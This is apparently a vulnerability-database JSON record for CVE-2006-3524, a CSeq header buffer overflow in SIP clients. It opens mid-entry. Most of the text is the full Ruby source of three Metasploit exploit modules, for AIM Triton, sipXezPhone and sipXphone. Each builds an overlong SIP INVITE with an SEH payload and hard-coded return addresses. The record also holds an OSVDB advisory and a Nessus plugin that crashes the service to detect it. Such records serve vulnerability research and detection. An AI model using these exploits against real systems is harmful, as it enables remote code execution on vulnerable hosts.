Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in AOL\\'s AIM\r\n\t\t\t\tTriton 1.0.4. By sending an overly long CSeq value,\r\n\t\t\t\ta remote attacker could overflow a buffer and execute\r\n\t\t\t\tarbitrary code on the system with the privileges of\r\n\t\t\t\tthe affected application.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3524'],\r\n\t\t\t\t\t['OSVDB', '27122' ],\r\n\t\t\t\t\t['BID', '18906'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 400,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jul 10 2006',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(5061)\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tuser = rand_text_english(2, payload_badchars)\r\n\t\tport = rand(65535).to_s\r\n\t\tfiller = rand_text_english(792, payload_badchars)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\tfiller[780, seh.length] = seh\r\n\r\n\t\tsploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\r\n\t\tsploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\r\n\t\tsploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\r\n\t\tsploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\r\n\t\tsploit << \"CSeq: \" + filler + \"\\r\\n\"\r\n\t\tsploit << \"Max-Forwards: 20\" + \"\\r\\n\"\r\n\t\tsploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tudp_sock.put(sploit)\r\n\r\n\t\thandler\r\n\t\tdisconnect_udp\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16353/"}], "metasploit": [{"lastseen": "2020-08-19T23:33:07", "description": "This module exploits a buffer overflow in AOL\\'s AIM Triton 1.0.4. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.\n", "published": "2006-11-02T01:16:40", "type": "metasploit", "title": "AIM Triton 1.0.4 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/SIP/AIM_TRITON_CSEQ", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AIM Triton 1.0.4 CSeq Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in AOL\\'s AIM\n Triton 1.0.4. By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.\n },\n 'Author' => 'MC',\n 'References' =>\n [\n ['CVE', '2006-3524'],\n ['OSVDB', '27122' ],\n ['BID', '18906'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jul 10 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(5061)\n ])\n end\n\n def exploit\n connect_udp\n\n user = rand_text_english(2, payload_badchars)\n port = rand(65535).to_s\n filler = rand_text_english(792, payload_badchars)\n seh = generate_seh_payload(target.ret)\n filler[780, seh.length] = seh\n\n sploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\n sploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\n sploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\n sploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\n sploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\n sploit << \"CSeq: \" + filler + \"\\r\\n\"\n sploit << \"Max-Forwards: 20\" + \"\\r\\n\"\n sploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\n\n print_status(\"Trying target #{target.name}...\")\n\n udp_sock.put(sploit)\n\n handler\n disconnect_udp\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sip/aim_triton_cseq.rb"}, {"lastseen": "2020-06-26T10:48:08", "description": "This module exploits a buffer overflow in SIPfoundry's sipXezPhone version 0.35a. By sending an long CSeq header, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.\n", "published": "2006-09-13T06:20:05", "type": "metasploit", "title": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/SIP/SIPXEZPHONE_CSEQ", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SIPfoundry sipXezPhone 0.35a CSeq Field Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in SIPfoundry's\n sipXezPhone version 0.35a. By sending an long CSeq header,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.\n },\n 'Author' => 'MC',\n 'References' =>\n [\n ['CVE', '2006-3524'],\n ['OSVDB', '27122'],\n ['BID', '18906'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n\n 'Targets' =>\n [\n ['sipXezPhone 0.35a Universal', { 'Ret' => 0x1008e853 } ],\n ],\n\n 'Privileged' => false,\n\n 'DisclosureDate' => 'Jul 10 2006',\n\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(5060)\n ])\n end\n\n def exploit\n connect_udp\n\n print_status(\"Trying target #{target.name}...\")\n\n user = rand_text_english(2, payload_badchars)\n port = rand(65535).to_s\n filler = rand_text_english(260, payload_badchars)\n seh = generate_seh_payload(target.ret)\n filler[252, seh.length] = seh\n\n sploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\n sploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\n sploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\n sploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\n sploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\n sploit << \"CSeq: \" + filler + \"\\r\\n\"\n sploit << \"Max-Forwards: 20\" + \"\\r\\n\"\n sploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\n\n udp_sock.put(sploit)\n\n handler\n disconnect_udp\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sip/sipxezphone_cseq.rb"}, {"lastseen": "2020-03-14T07:31:47", "description": "This module exploits a buffer overflow in SIPfoundry's sipXphone 2.6.0.27. By sending an overly long CSeq value, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the affected application.\n", "published": "2006-11-01T12:14:54", "type": "metasploit", "title": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3524"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/SIP/SIPXPHONE_CSEQ", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Udp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in SIPfoundry's\n sipXphone 2.6.0.27. By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.\n },\n 'Author' => 'MC',\n 'References' =>\n [\n [ 'CVE', '2006-3524' ],\n [ 'OSVDB', '27122' ],\n [ 'BID', '18906' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x20\\x09\\x0d\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'SIPfoundry sipXphone 2.6.0.27 Universal', { 'Ret' => 0x08016aac } ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jul 10 2006',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(5060)\n ])\n end\n\n def exploit\n connect_udp\n\n user = rand_text_english(2, payload_badchars)\n port = rand(65535).to_s\n filler = rand_text_english(212, payload_badchars)\n seh = generate_seh_payload(target.ret)\n filler[204, seh.length] = seh\n\n sploit = \"INVITE sip:#{user}\\@127.0.0.1 SIP/2.0\" + \"\\r\\n\"\n sploit << \"To: <sip:#{rhost}:#{rport}>\" + \"\\r\\n\"\n sploit << \"Via: SIP/2.0/UDP #{rhost}:#{port}\" + \"\\r\\n\"\n sploit << \"From: \\\"#{user}\\\"<sip:#{rhost}:#{port}>\" + \"\\r\\n\"\n sploit << \"Call-ID: #{(rand(100)+100)}#{rhost}\" + \"\\r\\n\"\n sploit << \"CSeq: \" + filler + \"\\r\\n\"\n sploit << \"Max-Forwards: 20\" + \"\\r\\n\"\n sploit << \"Contact: <sip:127.0.0.1:#{port}>\" + \"\\r\\n\\r\\n\"\n\n print_status(\"Trying target #{target.name}...\")\n\n udp_sock.put(sploit)\n\n handler\n disconnect_udp\n\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/sip/sipxphone_cseq.rb"}], "osvdb": [{"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3524"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in SIPfoundry, Inc. siXtapi. The program fails to validate the length of the 'CSeq' field of an INVITE message resulting in a buffer overflow. With a specially crafted message, an attacker can run arbitrary code resulting in a loss of integrity.\n## Technical Description\nSIPfoundry, Inc. sipXtapi is not distributed as a versioned package. The versions released before March 24th, 2006 are vulnerable to this issue.\n## Solution Description\nUpgrade to versions released on or after 2006-03-24, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in SIPfoundry, Inc. siXtapi. The program fails to validate the length of the 'CSeq' field of an INVITE message resulting in a buffer overflow. With a specially crafted message, an attacker can run arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.sipfoundry.org/\nSecurity Tracker: 1016455\n[Secunia Advisory ID:20997](https://secuniaresearch.flexerasoftware.com/advisories/20997/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0109.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0495.html\nKeyword: ERNW Security Advisory 02-2006\nISS X-Force ID: 27681\nFrSIRT Advisory: ADV-2006-2735\n[CVE-2006-3524](https://vulners.com/cve/CVE-2006-3524)\nBugtraq ID: 18906\n", "modified": "2006-07-10T10:33:55", "published": "2006-07-10T10:33:55", "href": "https://vulners.com/osvdb/OSVDB:27122", "id": "OSVDB:27122", "title": "sipXtapi INVITE Message CSeq Field Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-04-01T06:03:14", "description": "The remote host is running a SIP user agent that appears to be compiled\nusing a version of SIP Foundry's SipXtapi library before March 24, 2006. \nSuch versions contain a buffer overflow flaw that is triggered when\nprocessing a specially crafted packet with a long value for the 'CSeq'\nfield. A remote attacker may be able to exploit this issue to execute\narbitrary code on the affected host subject to the privileges of the\ncurrent user.", "edition": 28, "published": "2006-07-25T00:00:00", "title": "sipXtapi INVITE Message CSeq Field Header Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3524"], "modified": "2021-04-02T00:00:00", "cpe": [], "id": "SIPXTAPI_CSEQ_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/22092", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22092);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2019/03/06 18:38:55\");\n\n script_cve_id(\"CVE-2006-3524\");\n script_bugtraq_id(18906);\n\n script_name(english:\"sipXtapi INVITE Message CSeq Field Header Remote Overflow\");\n script_summary(english:\"Sends an SIP packet with a bad CSeq field\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains an application that is vulnerable to a remote\nbuffer overflow attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a SIP user agent that appears to be compiled\nusing a version of SIP Foundry's SipXtapi library before March 24, 2006. \nSuch versions contain a buffer overflow flaw that is triggered when\nprocessing a specially crafted packet with a long value for the 'CSeq'\nfield. A remote attacker may be able to exploit this issue to execute\narbitrary code on the affected host subject to the privileges of the\ncurrent user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439617/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2006/Jul/161\");\n script_set_attribute(attribute:\"solution\", value:\"Contact the software vendor to see if an upgrade is available.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"Misc.\");\n script_copyright(english:\"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sip_detection.nasl\");\n script_require_ports(\"Services/udp/sip\", \"Services/sip\");\n\n exit(0);\n}\n\nfunction try_dos(port, proto)\n{\n local_var res, res2, soc, soc2, encaps, via_protocol, probe, sploit;\n\n if (proto == 'udp')\n {\n if (!get_udp_port_state(port)) return FALSE;\n if (islocalhost()) soc = open_sock_udp(port);\n else soc = open_priv_sock_udp(sport:port, dport:port);\n }\n else\n {\n if (!get_tcp_port_state(port)) return FALSE;\n soc = open_sock_tcp(port);\n }\n if (!soc) return FALSE;\n\n via_protocol = proto;\n\n encaps = get_port_transport(port);\n if (!isnull(encaps) && proto == 'tcp')\n {\n if (encaps && encaps > ENCAPS_IP)\n via_protocol = 'tls';\n }\n\n # Make sure the service is up.\n #\n # nb: this is what's used in sip_detection.nasl.\n probe =\n \"OPTIONS sip:\" + get_host_name() + \" SIP/2.0\" + '\\r\\n' +\n \"Via: SIP/2.0/\" + toupper(via_protocol) + \" \" + compat::this_host() + \":\" + port + '\\r\\n' +\n 'Max-Forwards: 70\\r\\n' +\n \"To: <sip:\" + compat::this_host() + \":\" + port + '>\\r\\n' +\n \"From: Nessus <sip:\" + compat::this_host() + \":\" + port + '>\\r\\n' +\n \"Call-ID: \" + rand() + '\\r\\n' +\n 'CSeq: 63104 OPTIONS\\r\\n' +\n \"Contact: <sip:\" + compat::this_host() + '>\\r\\n' +\n 'Accept: application/sdp\\r\\n' +\n 'Content-Length: 0\\r\\n' +\n '\\r\\n';\n\n send(socket:soc, data:probe);\n res = recv(socket:soc, length:1024);\n\n if (!strlen(res) || isnull(res))\n {\n close(soc);\n return FALSE;\n }\n\n # http://en.wikipedia.org/wiki/List_of_SIP_response_codes\n if (!egrep(pattern:\"^SIP/2\\.0 [1-3][0-9][0-9] \", string:res))\n {\n close(soc);\n return FALSE;\n }\n\n # Try to crash the service.\n sploit =\n \"INVITE sip:user@\" + get_host_name() + \" SIP/2.0\" + '\\r\\n' +\n \"To: <sip:\" + compat::this_host() + \":\" + port + '>\\r\\n' +\n \"Via: SIP/2.0/\" + toupper(via_protocol) + \" \" + compat::this_host() + \":\" + port + '\\r\\n' +\n \"From: Nessus <sip:\" + compat::this_host() + \":\" + port + '>\\r\\n' +\n \"Call-ID: \" + rand() + '\\r\\n' +\n 'CSeq: 115792089237316195423570AAAA\\r\\n' +\n 'Max-Forwards: 70\\r\\n' +\n \"Contact: <sip:\" + compat::this_host() + '>\\r\\n' +\n '\\r\\n';\n\n send(socket:soc, data:sploit);\n res = recv(socket:soc, length:1024);\n close(soc);\n\n if (!strlen(res) || isnull(res))\n {\n res2 = NULL;\n\n if (proto == 'udp')\n {\n if (islocalhost()) soc2 = open_sock_udp(port);\n else soc2 = open_priv_sock_udp(sport:port, dport:port);\n }\n else\n {\n soc2 = open_sock_tcp(port);\n }\n if (soc2)\n {\n send(socket:soc2, data:probe);\n res2 = recv(socket:soc2, length:1024);\n close(soc2);\n }\n # double check to make sure service is actually down\n if (!strlen(res2) || isnull(res2))\n {\n security_hole(port:port, proto:proto);\n return TRUE;\n }\n }\n return FALSE;\n}\n\nudp_ports = get_kb_list(\"Services/udp/sip\");\ntcp_ports = get_kb_list(\"Services/sip\");\n\nis_vuln = FALSE;\n\n# loop through TCP ports\nif (!isnull(tcp_ports))\n{\n foreach port (make_list(tcp_ports))\n {\n if (try_dos(port:port, proto:\"tcp\")) is_vuln = TRUE;\n }\n}\n\n# loop through UDP ports\nif (!isnull(udp_ports))\n{\n foreach port (make_list(udp_ports))\n {\n if (try_dos(port:port, proto:\"udp\")) is_vuln = TRUE;\n }\n}\n\nif (!is_vuln) exit(0, \"The remote SIP services are not vulnerable.\");\nelse exit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
